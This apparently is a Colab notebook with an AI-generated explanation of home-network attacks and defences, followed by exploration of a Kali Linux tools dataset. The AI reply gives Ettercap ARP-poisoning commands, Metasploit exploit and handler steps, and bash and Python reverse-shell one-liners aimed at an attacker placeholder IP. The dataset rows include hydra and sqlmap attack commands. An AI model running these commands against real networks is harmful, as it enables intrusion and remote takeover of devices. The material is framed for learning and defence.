    *   **Change DNS Settings:** Redirect your DNS queries to their malicious DNS servers, which can log all your visited websites or even redirect you to fake versions of legitimate sites (phishing).
    *   **Install Malicious Firmware:** Replace your router's operating system with a modified version that logs all traffic, performs deep packet inspection, or even injects ads/malware into your browsing. This is a sophisticated attack.
    *   **Configure Traffic Mirroring/Sniffing (less common on consumer routers):** Some enterprise-grade routers and switches can mirror traffic to a specific port for monitoring. Consumer routers generally don't have this feature, but malicious firmware could implement it.

**Scenario 2: Attacker is *Connected to Your Internal Network* (but no router admin access)**
If an attacker is connected to your Wi-Fi (because they cracked the password, you gave it to them, or it was weak) or plugged into an Ethernet port, they are *inside* your local network. They *cannot* directly configure your router for external access unless they then gain admin access to the router. However, they can still do significant damage:

*   **How they 'Monitor All Internet Traffic' (Internal Attack):**
    *   **ARP Spoofing / ARP Cache Poisoning (Man-in-the-Middle - MiTM):** This is a very common technique. Your router acts as the gateway to the internet. When your computer wants to send data to the internet, it asks the router for its MAC address. ARP spoofing allows an attacker to tell your computer (and the router) that *their* device has the router's (or your computer's) MAC address. All your traffic then flows *through the attacker's device* before going to the router, allowing them to intercept and log it. Tools like `ettercap` or `bettercap` can automate this.
    *   **Wi-Fi Sniffing (if unencrypted or weak encryption):** If your Wi-Fi uses WEP (very old and insecure) or a weak WPA/WPA2 password, an attacker can capture all Wi-Fi traffic and decrypt it, seeing everything. If using strong WPA2/WPA3, they can't decrypt other users' traffic unless they know the PSK or compromise the Wi-Fi handshake.
    *   **DNS Spoofing (Local):** Similar to router-level DNS changes, they can perform local DNS poisoning to redirect your web requests to malicious servers.

*   **How they 'Open Ports for External Access' (Indirectly):**
    They can't configure the router directly. However, they can:
    *   **Compromise an Internal Device:** If they compromise a device on your network (your PC, an IoT device, a network-attached storage), they can then install malware that *itself* opens a "reverse shell" or establishes an outbound connection to their command-and-control server. This connection originates *from inside* your network, so it bypasses your router's firewall because it's seen as legitimate outbound traffic. Once established, they have a persistent channel into that device.

---

### Tools and Commands They Use

*   **Network Scanning & Discovery:**
    *   `Nmap` (Network Mapper): For discovering devices on a network, open ports, operating systems, and services.
    *   `Masscan`: Extremely fast port scanner.
    *   `Angry IP Scanner`: Graphical IP scanner.
*   **Packet Sniffing & Analysis:**
    *   `Wireshark`: The industry standard for capturing and analyzing network traffic.
    *   `Tcpdump`: Command-line packet analyzer.
*   **ARP Spoofing / MiTM:**
    *   `Ettercap`: Powerful suite for MiTM attacks, sniffing, and content injection.
    *   `Bettercap`: Modern, modular, and easy-to-use MiTM framework.
*   **Wi-Fi Cracking & Auditing:**
    *   `Aircrack-ng` suite: For cracking WEP/WPA/WPA2 passwords.
    *   `Hashcat`: General-purpose password cracker, often used with captured Wi-Fi handshakes.
*   **Exploitation Frameworks:**
    *   `Metasploit Framework`: Contains a vast database of exploits and payloads for various vulnerabilities, including routers, operating systems, and applications.
    *   `RouterPWN`: A collection of router exploits and tools.
*   **Remote Access & Backdoors:**
    *   `Netcat` (nc): "TCP/IP Swiss army knife" for creating shell connections.
    *   `Empire`, `Covenant`, `Metasploit`: Frameworks for creating sophisticated payloads (malware) and managing compromised systems (RATs - Remote Access Trojans).
    *   Common system commands: `net user` (Windows), `useradd` (Linux) for creating new user accounts. `schtasks` (Windows), `crontab` (Linux) for persistence.

---

### Establishing Persistent Access (Backdoors, Unauthorized Accounts)

**1. On the Router:**
*   **New Admin Accounts:** If they have router admin access, they can create new administrator accounts with their chosen username and password. They might also disable or delete existing legitimate admin accounts.
*   **Malicious Firmware:** Flashing custom, compromised firmware onto the router allows them to embed backdoors, logging capabilities, and other persistent malicious functionalities deep within the device's operating system.
*   **Scheduled Tasks/Scripts:** Some advanced routers allow scheduling tasks. An attacker could schedule a script to periodically report your public IP, reconnect to their server, or re-enable disabled features.

**2. On Your Internal Devices (PC, Servers, IoT):**
*   **Malware (RATs, Keyloggers):** If they exploit a vulnerability in a device (e.g., an unpatched OS, a vulnerable application) or trick you into installing something, they can deploy malware. This malware can:
    *   **Create new user accounts:** On your Windows, macOS, or Linux machine.
    *   **Install persistence mechanisms:** Such as services, scheduled tasks, startup entries, or rootkits to ensure the malware restarts even if the device reboots.
    *   **Open "reverse shells" or C2 channels:** The malware connects *outbound* to the attacker's server, providing a persistent, firewall-bypassing connection.
*   **Vulnerable Services:** If a device has an insecure service running (e.g., an outdated SSH server with weak credentials, an unauthenticated remote desktop), they can exploit it to gain access and establish persistence.

---

### Access Scope: Same Network vs. Full Router Access

*   **From their device on the same network (LAN/Wi-Fi):**
    *   **YES, they can do a lot:** They can scan your local network for other devices, exploit vulnerabilities on *those devices*, perform ARP spoofing to monitor traffic, and potentially gain access to shared drives/folders if they are misconfigured. They *cannot* directly configure your router's port forwarding or remote management settings *unless* they then gain administrative access to the router itself (e.g., by exploiting a vulnerability in the router or guessing its admin password).
    *   Think of it like being inside an office building. You can see and interact with other people and things inside, but you don't automatically get the keys to the main entrance/exit or the building's infrastructure controls.

*   **Need full access to the router directly?**
    *   **YES, for external exposure and comprehensive monitoring/control:** To open ports for external access (Port Forwarding, DMZ), to change your DNS settings, to enable remote management, or to install malicious firmware, they absolutely need administrative access to the router. This gives them control over the entire network's boundary.
    *   Think of this as having the keys to the entire building, including the main server room, security systems, and the ability to re-route mail.

---

### Do two devices connected to the same network have access to each other automatically?

**Generally, NO, not automatically.**

*   **Default Behavior:** Modern operating systems and devices have built-in firewalls and security measures that prevent automatic access. For example:
    *   Your Windows PC won't automatically share its files or allow remote desktop connections without explicit configuration.
    *   A smart TV or IoT device might allow certain internal network protocols for discovery (like Chromecast), but not full-blown file access.
*   **Potential for Access (if misconfigured or vulnerable):**
    *   **File Sharing:** If you have enabled network file sharing (e.g., Windows File Sharing, SMB/NFS on Linux, Apple File Sharing) and set it up without strong passwords or restricted access, other devices on the network could browse your shared folders.
    *   **Vulnerable Services:** If a device is running an outdated or insecure service (e.g., an old web server, an open SSH server with weak credentials, a remote desktop service without proper authentication), an attacker on the same network could exploit it.
    *   **Discovery:** While not "access," devices on the same network can usually "see" each other via broadcast messages (like ARP or mDNS) or by using network scanning tools (like Nmap) to find open ports and running services.

---

### Understanding Ports, Localhost, and Port Forwarding

Let's use an analogy: **Your house (or apartment building) is your computer.**

*   **Your computer's IP address** is like your **street address**. It tells people where to find your house on the internet (public IP) or within your neighborhood (local IP).
*   **Ports** are like **apartment numbers or specific phone extensions within your house**.
    *   When you receive mail at your street address (IP address), how does the post office know which apartment it's for, or if it's for the kitchen or the bedroom? It doesn't.
    *   Similarly, when data arrives at your computer's IP address, it needs to know *which application* or *service* on your computer it's intended for. That's what a port number does.
    *   Different applications "listen" on different ports for incoming data:
        *   **Port 80:** Standard for HTTP (unencrypted web traffic)
        *   **Port 443:** Standard for HTTPS (encrypted web traffic)
        *   **Port 22:** Standard for SSH (secure remote terminal access)
        *   **Port 21:** Standard for FTP (file transfer)
        *   **Port 3389:** Standard for RDP (Windows Remote Desktop)
    *   When you visit a website, your web browser makes an *outgoing* connection to the website's server on port 80 or 443. The server then sends the webpage back to a *random, high-numbered port* on your computer that your browser is listening on. This allows multiple applications to use the network simultaneously without their traffic getting mixed up.

*   **Localhost (127.0.0.1):**
    *   Imagine your house has an **internal intercom system** that connects to itself. You can talk to yourself from the kitchen to the bedroom without anyone outside hearing or even knowing you're talking.
    *   `localhost` or `127.0.0.1` is a special IP address that *always refers to the device you are currently on*. It's called the "loopback address."
    *   If you run a web server on your computer and want to access it from *the same computer*, you'd open your browser and go to `http://localhost` or `http://127.0.0.1`.
    *   This traffic never leaves your computer. It "loops back" internally. It's incredibly useful for testing software and services without exposing them to the network.
    *   **"When only local devices can see it with a scan"**: If you have a service listening on `localhost` (e.g., a web server running only on `127.0.0.1`), *only the computer itself* can access it. No other device on your network (or the internet) can. If a service is listening on your device's actual LAN IP address (e.g., 192.168.1.100), then other devices on your *local network* can see and try to connect to it with a scan (like Nmap).

*   **Port Forwarding:**
    *   Your router acts like a **doorman or receptionist** for your entire house/apartment building. It has *one public street address* (your public IP address) that the outside world sees.
    *   Normally, your router's firewall is like a locked front door. It lets *outgoing* traffic leave (you can call out), but it blocks most *unsolicited incoming* traffic (people can't just walk in without an invitation).
    *   **Port Forwarding is like telling your doorman: "If anyone from the outside world specifically asks for 'apartment number 8080', please send them directly to apartment #80 on 192.168.1.100 (my internal web server)."**
    *   It tells your router to take incoming traffic on a specific port from your public IP address and redirect it to a specific internal IP address and port on one of your devices.
    *   **"Compared to the entire world can scan it?"**: When you set up port forwarding, you are *explicitly telling your router to open a specific port* on your public IP address and pass traffic through. This makes that port and the service behind it visible and accessible from anywhere on the internet. Yes, scanners (like Shodan.io) continuously scan the entire internet for open ports, and if you forward a port, it will eventually be discovered.

---

### How to Protect Yourself

1.  **Change Router Admin Credentials IMMEDIATELY:** Use a strong, unique password for your router's admin interface. Never leave it at the default.
2.  **Keep Router Firmware Updated:** Check for and install firmware updates regularly. These often contain critical security patches. Consider open-source firmware like DD-WRT or OpenWrt if your router supports it, but be aware of the complexities.
3.  **Disable Remote Management:** Unless you absolutely need to manage your router from outside your home, disable this feature.
4.  **Disable WPS:** Wi-Fi Protected Setup (WPS) is known to have vulnerabilities. Disable it if possible.
5.  **Use Strong Wi-Fi Passwords (WPA2/WPA3):** A strong, complex passphrase (at least 12-16 characters, mix of characters) for your Wi-Fi network.
6.  **Review Port Forwarding and DMZ Settings:** Regularly check your router settings. If you see any port forwarding rules or devices in the DMZ that you didn't set up, delete them immediately.
7.  **Network Segmentation (Advanced):** If your router supports it, create a separate "Guest Wi-Fi" network for visitors and IoT devices. This isolates them from your main devices (PCs, phones).
8.  **Keep All Devices Updated:** Ensure your operating systems (Windows, macOS, Linux, phone OS) and all applications are kept up-to-date. Patching vulnerabilities is crucial.
9.  **Use a Strong Antivirus/Anti-malware:** Keep it updated and run regular scans.
10. **Use a Firewall on Your Devices:** Ensure your operating system's firewall is enabled and properly configured.
11. **Be Wary of Suspicious Links/Downloads:** Phishing and malware are common ways for attackers to gain initial access.
12. **Consider a VPN Service:** A good VPN encrypts your traffic from your device to the VPN server, making it harder for local network attackers (even with ARP spoofing) to read your traffic.

Understanding these concepts is the first step towards securing your network. It's a continuous process!

In [ ]:
# Only text-to-text input/output is supported
from google.colab import ai

response = ai.generate_text("Can you give me a step-by-step walkthrough of how an attacker would use tools like Wireshark, Ettercap, Nmap, etc, to analyze my network traffic? What commands exactly would they use, how would they set up a 'port' to access my network from anywhere, and any other steps that attackers use? Can you explain some common ways that I'd set up Port Forwarding without even knowing it, like what services or etc do people use without knowing it can be scanned from anywhere in the world?")
print(response)

It's important to understand that gaining unauthorized access to any network is illegal and unethical. This information is provided purely for educational purposes to help you understand potential vulnerabilities and strengthen your own network defenses.

Let's break down how an attacker might approach analyzing and potentially exploiting a network, focusing on the tools you mentioned and common vulnerabilities.

---

### **Disclaimer: Educational Purposes Only**

This guide describes techniques used in cybersecurity. Engaging in these activities without explicit, written permission from the network owner is illegal and can lead to severe penalties, including fines and imprisonment. Always practice ethical hacking in controlled, authorized environments (e.g., your own test lab, bug bounty programs, penetration testing with consent).

---

### Attacker Mindset: The "Kill Chain"

Attackers generally follow a structured approach, often referred to as a "kill chain" or "attack lifecycle":

1.  **Reconnaissance:** Gathering information about the target.
2.  **Weaponization:** Creating an exploit/payload.
3.  **Delivery:** Getting the exploit to the target.
4.  **Exploitation:** Triggering the vulnerability.
5.  **Installation:** Installing backdoors/malware for persistence.
6.  **Command and Control (C2):** Establishing communication to control the compromised system.
7.  **Actions on Objectives:** Achieving their ultimate goal (data theft, sabotage, etc.).
8.  **Covering Tracks:** Removing evidence of their presence.

We'll focus primarily on **Reconnaissance**, **Exploitation/Installation**, and **C2** in the context of your questions.

---

### Step-by-Step Walkthrough: Analyzing Network Traffic and Gaining Access

Let's assume the attacker is either:
    a) **External:** Trying to get into your network from the internet.
    b) **Internal:** Already gained some initial access (e.g., connected to your Wi-Fi, or a compromised IoT device) and is now trying to move laterally.

#### Phase 1: Reconnaissance (Information Gathering)

The goal is to learn as much as possible about the target network and its devices.

**1. External Recon (From the Internet):**

*   **Objective:** Identify your public IP address, open ports, and services exposed to the internet.
*   **Tools:** `whois`, `nslookup`/`dig`, **Nmap**

    *   **Finding Public IP:**
        *   *Attacker Action:* They might use `whois` on a domain name you own or simply search for "what's my IP" if they are physically near your location or obtained it through other means.
        *   *Command (example, for a domain):* `whois example.com` (This often reveals the IP range of the hosting provider, not necessarily a home IP directly).
        *   *Command (example, if they know your general location):* Look up common ISP ranges.

    *   **Port Scanning with Nmap:** This is the primary tool for identifying open ports and services.
        *   *Attacker Action:* Scan your public IP address.
        *   *Command 1: Basic Port Scan (SYN Stealth Scan, common ports)*
            ```bash
            nmap -sS <Your_Public_IP_Address>
            ```
            *   **Explanation:** `-sS` performs a stealthy SYN scan, which is less likely to be logged by firewalls than a full TCP connect scan. By default, it scans the 1000 most common ports.
            *   **What it reveals:** Which ports are open (e.g., 22 for SSH, 80 for HTTP, 443 for HTTPS, 3389 for RDP, 21 for FTP).

        *   *Command 2: Service Version Detection & OS Guessing*
            ```bash
            nmap -sV -O <Your_Public_IP_Address>
            ```
            *   **Explanation:** `-sV` attempts to determine the service and its version running on open ports. `-O` attempts to guess the operating system.
            *   **What it reveals:** Not just that port 80 is open, but that it's running Apache HTTP Server 2.4.x on Ubuntu Linux, for example. This is critical for finding known vulnerabilities.

        *   *Command 3: Aggressive Scan (Combines many techniques)*
            ```bash
            nmap -A <Your_Public_IP_Address>
            ```
            *   **Explanation:** `-A` enables OS detection, version detection, script scanning (default scripts), and traceroute. This is noisier but provides a lot of information.

        *   *Command 4: Vulnerability Script Scanning (e.g., for specific CVEs)*
            ```bash
            nmap --script vuln <Your_Public_IP_Address>
            ```
            *   **Explanation:** `nmap` can run scripts to check for common vulnerabilities on detected services.

**2. Internal Recon (If already on your local network, e.g., via Wi-Fi):**

*   **Objective:** Map out all devices on the local network, their IPs, open ports, and potential vulnerabilities.
*   **Tools:** **Nmap**, **Wireshark**

    *   **Finding Devices on the Network (Nmap Host Discovery):**
        *   *Attacker Action:* Identify the network range (e.g., `192.168.1.0/24`).
        *   *Command:*
            ```bash
            nmap -sn 192.168.1.0/24
            ```
            *   **Explanation:** `-sn` (or `-sP` in older Nmap) performs a ping scan to discover live hosts without port scanning. This quickly tells them which IPs are active.

    *   **Detailed Scanning of Internal Devices (Nmap):** Once active IPs are found, the attacker will run the same detailed `nmap -sV -O` or `nmap -A` scans on individual internal IPs (e.g., `192.168.1.10`, `192.168.1.150`).

    *   **Traffic Sniffing with Wireshark (Passive Listening):**
        *   *Attacker Action:* If the attacker has direct access to the network (e.g., plugged into a switch, or connected to Wi-Fi) and the network is *not* using switched Ethernet with port security (uncommon in home networks), they *might* be able to capture some traffic directly. However, in modern switched networks, they typically need to perform a Man-in-the-Middle (MITM) attack first.
        *   *Command:* `wireshark` (GUI) or `tshark -i eth0 -w capture.pcap` (CLI for capturing to a file)
        *   *Filters (in Wireshark GUI or tshark):*
            *   `ip.addr == 192.168.1.100` (show traffic to/from a specific IP)
            *   `tcp.port == 80` (show HTTP traffic)
            *   `http.request.method == "POST"` (look for form submissions)
            *   `ftp` (show FTP traffic, often unencrypted)
            *   `telnet` (show Telnet traffic, always unencrypted)
        *   **What it reveals:** Hostnames, services being accessed, potentially unencrypted credentials, network protocols in use, communication patterns.

#### Phase 2: Gaining Access / Man-in-the-Middle (MITM)

This is where tools like Ettercap come in, primarily for internal network attacks.

*   **Objective:** Intercept and potentially modify network traffic.
*   **Tool:** **Ettercap** (often combined with Wireshark)

    *   **ARP Spoofing / Poisoning (The MITM Attack):**
        *   *Attacker Action:* Pretend to be the router to your devices, and pretend to be your devices to the router. All your traffic then passes through the attacker's machine.
        *   *Setup:* The attacker must be on the *same local network* as the target and the gateway (router).
        *   *Command (GUI, common for Ettercap):*
            ```bash
            ettercap -G
            ```
            *   **Steps in Ettercap GUI:**
                1.  Start unified sniffing (`Sniff -> Unified sniffing`). Select the correct network interface (e.g., `eth0` or `wlan0`).
                2.  Scan for hosts (`Hosts -> Scan for hosts`).
                3.  View host list (`Hosts -> Hosts list`).
                4.  Select the target (your computer's IP) and add it to `Target 1`.
                5.  Select the gateway (router's IP) and add it to `Target 2`.
                6.  Start ARP poisoning (`Mitm -> ARP poisoning`). Enable "Sniff remote connections" if available.
                7.  Start sniffing.
        *   *Command (CLI example, for passive sniffing after ARP spoofing):*
            ```bash
            ettercap -Tq -i eth0 -M arp:remote /target_ip/ /router_ip/
            ```
            *   **Explanation:** This starts a text-based ARP poisoning attack. `-Tq` is quiet text mode, `-i eth0` specifies the interface, `-M arp:remote` performs remote ARP poisoning. The `/target_ip/` is your IP, and `/router_ip/` is your router's IP.
        *   **What it enables:**
            *   **Full Traffic Capture:** Now, Wireshark on the attacker's machine can capture *all* traffic between your device and the internet, including unencrypted passwords (HTTP, FTP, Telnet, old email protocols).
            *   **DNS Spoofing:** Redirect you to fake websites (e.g., a fake banking site).
            *   **Packet Injection:** Inject malicious code or content into unencrypted web pages.

#### Phase 3: Exploitation and Establishing Remote Access (The "Port to Access From Anywhere")

This is where the attacker turns reconnaissance and potential MITM into persistent control.

*   **Objective:** Gain a shell (command line access) on a target machine, often referred to as a "backdoor" or "reverse shell," and make it accessible from anywhere.
*   **Tools:** **Metasploit**, **Netcat (`nc`)**, custom scripts, exploiting known vulnerabilities.

**Scenario A: Exploiting a Known Vulnerability (from Nmap scans)**

1.  **Vulnerability Identification:** Nmap identified a service (e.g., an outdated web server, an unpatched IoT device, a network-attached storage (NAS) device) with a known vulnerability (e.g., "Apache 2.2.x - Remote Code Execution").
2.  **Exploit Selection:** The attacker uses a framework like **Metasploit** to find an exploit module for that specific vulnerability.
    *   *Attacker Action:* Search Metasploit.
    *   *Metasploit Commands (example for a hypothetical vulnerability):*
        ```metasploit
        msfconsole
        search apache remote code execution
        use exploit/multi/http/apache_mod_cgi_bash_env_rce
        set RHOSTS <Target_IP>
        set LHOST <Attacker_IP> # Your machine's IP, used for reverse connection
        set LPORT 4444          # Port you'll listen on
        exploit
        ```
    *   **Explanation:** `RHOSTS` is the target's IP. `LHOST` and `LPORT` are the attacker's machine's IP and port, respectively, where they will listen for the "reverse shell" connection from the compromised machine.

**Scenario B: Getting a "Reverse Shell" (The "Port from Anywhere")**

This is the most common way an attacker establishes remote access without needing *you* to have port forwarding set up for *their* access.

*   **How it Works (Reverse Shell):**
    1.  The attacker's machine is configured to "listen" for an incoming connection on a specific port.
    2.  The *compromised target machine* (inside your network) initiates an *outgoing* connection to the attacker's public IP address and listening port.
    3.  Because the connection is *outbound* from your network, your router's NAT and firewall typically allow it (most home routers allow all outbound connections).
    4.  Once connected, the attacker has a shell on your internal machine.

*   **Commands:**
    *   **Attacker (Listener - on their public IP):**
        ```bash
        nc -lvnp 4444
        # Or with Metasploit's handler for more features:
        msfconsole
        use exploit/multi/handler
        set PAYLOAD linux/x64/shell_reverse_tcp
        set LHOST <Attacker_Public_IP>
        set LPORT 4444
        exploit -j
        ```
        *   **Explanation:** `nc -lvnp 4444` uses Netcat to listen (`-l`) verbosely (`-v`) on a numbered port (`-n`) 4444 (`-p`). `msfconsole` is the Metasploit console. The `handler` module is used to catch reverse shells.

    *   **Target (If code execution is achieved - *this is what the exploit delivers*):**
        ```bash
        bash -i >& /dev/tcp/<Attacker_Public_IP>/4444 0>&1
        # Or a Python reverse shell:
        python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attacker_Public_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
        # Many other variations depending on the target OS and installed tools.
        ```
        *   **Explanation:** This command, executed on your compromised machine, tells it to open a TCP connection to the attacker's IP on port 4444 and redirect its input/output to that connection, effectively giving the attacker a shell.

#### Phase 4: Maintaining Access and Lateral Movement

Once a foothold is established, the attacker will:

1.  **Install Persistent Backdoors:** Ensure they can reconnect even if the initial exploit is patched or the machine reboots.
2.  **Escalate Privileges:** Try to gain root/administrator access on the compromised machine.
3.  **Lateral Movement:** Use the compromised machine as a pivot to scan and attack other devices *within your internal network* (using Nmap, Wireshark, etc., from inside).
4.  **Data Exfiltration:** Steal data.

---

### Common Ways You'd Set Up Port Forwarding Without Even Knowing It

Many services and devices require or facilitate port forwarding, often without explicit user understanding of the security implications.

1.  **Universal Plug and Play (UPnP):**
    *   **What it is:** A protocol that allows devices on your local network to automatically ask your router to open specific ports for them.
    *   **How it exposes you:** Malware on a compromised internal device can use UPnP to open ports for its own C2 communication, effectively creating a backdoor. Many legitimate devices use it without asking for explicit user consent.
    *   **Services that use it:** Gaming consoles (Xbox, PlayStation), some IoT devices (security cameras, smart home hubs), peer-to-peer (P2P) file-sharing applications, some media servers (Plex, Emby), older VoIP phones.
    *   **How to check/fix:** Log into your router's administration interface. Look for "UPnP" settings and disable them. You'll then need to manually forward ports for any services that legitimately need it.

2.  **IoT Devices (Internet of Things):**
    *   **What it is:** Smart cameras, smart doorbells, network-attached storage (NAS), smart home hubs, baby monitors.
    *   **How it exposes you:** Many IoT devices come with "remote access" or "cloud access" features enabled by default or easily configured. This often involves either UPnP or the device making an outbound connection to a manufacturer's server, which then proxies connections to your device. If these devices have vulnerabilities, they can be directly attacked from the internet.
    *   **How to check/fix:** Review settings for all your IoT devices. Disable remote access features if not strictly needed. Use strong, unique passwords. Keep firmware updated. Isolate them on a separate "guest" or "IoT" Wi-Fi network if your router supports it.

3.  **Gaming:**
    *   **What it is:** Online multiplayer games, hosting game servers.
    *   **How it exposes you:** To get "Open NAT" or to host a game server, games or consoles might ask you to enable UPnP or guide you through manual port forwarding.
    *   **How to check/fix:** Check your router for manually configured port forwards that you might have set up for a game years ago and forgotten.

4.  **Remote Desktop (RDP, SSH, VNC):**
    *   **What it is:** Accessing your computer remotely (e.g., from work, while traveling).
    *   **How it exposes you:** Many users manually forward port 3389 (RDP for Windows) or port 22 (SSH for Linux/macOS) directly to their computer. This is a huge target for attackers, especially RDP, which is frequently brute-forced.
    *   **How to check/fix:** Never forward RDP (port 3389) directly to the internet. If you need remote access, use a VPN (which encrypts traffic and can be configured to not forward RDP directly), or use SSH with strong key-based authentication (and change the default port).

5.  **Personal Web Servers / File Servers:**
    *   **What it is:** Hosting a personal website, a private cloud (like Nextcloud), or a file-sharing service from your home.
    *   **How it exposes you:** Requires forwarding ports 80 (HTTP) and/or 443 (HTTPS). If the server software is outdated or misconfigured, it can be exploited.
    *   **How to check/fix:** Ensure any server software is always up to date and properly secured. Consider using a reverse proxy or cloud-based hosting instead of exposing your home network directly.

6.  **P2P File Sharing (BitTorrent, etc.):**
    *   **What it is:** Software for sharing files directly between users.
    *   **How it exposes you:** These applications often request or configure UPnP to open ports for better connectivity, or users manually forward ports.
    *   **How to check/fix:** Disable UPnP and avoid manually forwarding ports for P2P software.

### Defensive Measures You Can Take

Understanding these attack vectors is the first step to defending against them:

1.  **Disable UPnP:** Log into your router's administration panel and disable UPnP. This is one of the most critical steps for home users.
2.  **Review Port Forwarding Rules:** Check your router for any manually configured port forwarding rules. If you don't recognize them or no longer use the service, delete them.
3.  **Strong, Unique Passwords:** For your Wi-Fi, router administration, and all online accounts. Enable Two-Factor Authentication (2FA) wherever possible.
4.  **Keep Software Updated:** Regularly update your operating systems, applications, router firmware, and IoT device firmware. Patches often fix critical security vulnerabilities.
5.  **Firewall Your Devices:** Ensure the firewall on your computer (Windows Defender Firewall, macOS firewall, Linux `ufw`/`iptables`) is enabled and configured to block unsolicited incoming connections.
6.  **Network Segmentation (Guest Wi-Fi):** If your router supports it, put your IoT devices and guest devices on a separate "guest" Wi-Fi network, which is typically isolated from your main network.
7.  **Consider a VPN:** For your *outgoing* traffic. A VPN encrypts your connection to a remote server, making it harder for your ISP or local snoops to see your traffic, but it doesn't prevent direct attacks on open ports on your home network.
8.  **Be Wary of Public Wi-Fi:** Avoid sensitive activities (banking, email) on public Wi-Fi where MITM attacks are easier to perform. Use a VPN if you must.
9.  **Security Awareness:** Be suspicious of unexpected emails, links, or file downloads. Social engineering is a major attack vector.

By understanding how attackers might approach your network and by taking proactive steps to secure your devices and router, you can significantly reduce your attack surface.



---



---

<br>

---

# **<u>Kali-Linux-Dataset-Snippets</u>**

In [ ]:
import kagglehub
path = kagglehub.dataset_download("cyberprince/kali-linux-toolkit-dataset")

Using Colab cache for faster access to the 'kali-linux-toolkit-dataset' dataset.

In [ ]:
import pandas as pd

# The file path is stored in the 'path' variable from the previous step
file_path = f'{path}/KALI_LINUX_TOOLS_DATASET.jsonl'

# Read the JSON Lines file into a pandas DataFrame
df = pd.read_json(file_path, lines=True)

# Display the first 5 rows of the DataFrame
print("First 5 rows of the dataset:")
display(df.head())

First 5 rows of the dataset:

,tool,command,description,category,use_case,flags,os,reference_link,supported_languages
0,nmap,nmap -sV -p 1-65535 192.168.1.1,Scan all TCP ports and detect service versions...,Networking,Port scanning and service detection,"[-sV, -p]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
1,nmap,nmap -sS -O 192.168.1.1,Perform a stealth SYN scan and OS detection.,Networking,Stealth scanning and OS fingerprinting,"[-sS, -O]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
2,metasploit,msfconsole -q -x 'use exploit/multi/handler; s...,Set up a reverse TCP handler for incoming conn...,Exploitation,Exploit handling and payload delivery,"[-q, -x]",Linux,https://docs.metasploit.com/,NaN
3,sqlmap,sqlmap -u http://example.com --dbs,Enumerate databases on a vulnerable web applic...,Web Application,SQL injection testing,"[-u, --dbs]",Linux,http://sqlmap.org/,NaN
4,hydra,hydra -l admin -P passwords.txt ftp://192.168.1.1,Brute-force FTP credentials using a password l...,Password Cracking,Credential brute-forcing,"[-l, -P]",Linux,https://www.kali.org/tools/hydra/,NaN

You can also get a summary of the DataFrame to see column names, data types, and non-null counts:

In [ ]:
# Display information about the DataFrame
print("DataFrame Information:")
df.info()

DataFrame Information:
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 790 entries, 0 to 789
Data columns (total 9 columns):
 #   Column               Non-Null Count  Dtype
---  ------               --------------  -----
 0   tool                 790 non-null    object
 1   command              790 non-null    object
 2   description          790 non-null    object
 3   category             790 non-null    object
 4   use_case             790 non-null    object
 5   flags                790 non-null    object
 6   os                   790 non-null    object
 7   reference_link       790 non-null    object
 8   supported_languages  50 non-null     object
dtypes: object(9)
memory usage: 55.7+ KB

Once loaded into a DataFrame, you can easily organize and query the data. For example, to see all unique categories of tools:

In [ ]:
# Get all unique categories
print("Unique tool categories:")
print(df['category'].unique())

Unique tool categories:
['Networking' 'Exploitation' 'Web Application' 'Password Cracking'
 'Wireless' 'Forensics' 'Social Engineering' 'Reverse Engineering'
 'Sniffing and Spoofing' 'Information Gathering' 'Wireless Attacks'
 'Post-Exploitation' 'Code Analysis' 'Reporting']

Or to filter for tools within a specific category, like 'Web Application':

In [ ]:
# Filter for tools in the 'Web Application' category
web_app_tools = df[df['category'] == 'Web Application']
print("Tools in 'Web Application' category:")
display(web_app_tools.head())

Tools in 'Web Application' category:

,tool,command,description,category,use_case,flags,os,reference_link,supported_languages
3,sqlmap,sqlmap -u http://example.com --dbs,Enumerate databases on a vulnerable web applic...,Web Application,SQL injection testing,"[-u, --dbs]",Linux,http://sqlmap.org/,NaN
6,burpsuite,java -jar burpsuite.jar,Launch Burp Suite for web vulnerability testing.,Web Application,Web application security testing,[],Linux,https://portswigger.net/burp/documentation,NaN
10,nikto,nikto -h http://example.com,Scan web server for vulnerabilities and miscon...,Web Application,Web server vulnerability scanning,[-h],Linux,https://cirt.net/Nikto2,NaN
11,dirb,dirb http://example.com wordlist.txt,Brute-force directories and files on a web ser...,Web Application,Directory enumeration,[],Linux,https://www.kali.org/tools/dirb/,NaN
12,sqlmap,sqlmap -u http://example.com --tables,Enumerate tables in a database via SQL injection.,Web Application,SQL injection exploitation,"[-u, --tables]",Linux,http://sqlmap.org/,NaN

### 1. Grouping and Counting Tools per Category

This is a great way to summarize the dataset and understand the distribution of tools across different categories.

In [ ]:
# Group by 'category' and count the number of tools in each
tools_per_category = df.groupby('category')['tool'].count().sort_values(ascending=False).reset_index()
tools_per_category.columns = ['Category', 'Number of Tools']

print("Number of tools per category:")
display(tools_per_category)

Number of tools per category:

                 Category  Number of Tools
0   Information Gathering               92
1     Reverse Engineering               88
2         Web Application               86
3            Exploitation               79
4       Post-Exploitation               78
5        Wireless Attacks               70
6      Social Engineering               68
7               Reporting               51
8               Forensics               50
9           Code Analysis               50
10  Sniffing and Spoofing               50
11      Password Cracking               12
12             Networking               11
13               Wireless                5

### 2. Viewing a larger portion of the DataFrame

In [ ]:
# Display the first 20 rows of the DataFrame
print("First 20 rows of the dataset:")
display(df.head(20))

First 20 rows of the dataset:

,tool,command,description,category,use_case,flags,os,reference_link,supported_languages
0,nmap,nmap -sV -p 1-65535 192.168.1.1,Scan all TCP ports and detect service versions...,Networking,Port scanning and service detection,"[-sV, -p]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
1,nmap,nmap -sS -O 192.168.1.1,Perform a stealth SYN scan and OS detection.,Networking,Stealth scanning and OS fingerprinting,"[-sS, -O]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
2,metasploit,msfconsole -q -x 'use exploit/multi/handler; s...,Set up a reverse TCP handler for incoming conn...,Exploitation,Exploit handling and payload delivery,"[-q, -x]",Linux,https://docs.metasploit.com/,NaN
3,sqlmap,sqlmap -u http://example.com --dbs,Enumerate databases on a vulnerable web applic...,Web Application,SQL injection testing,"[-u, --dbs]",Linux,http://sqlmap.org/,NaN
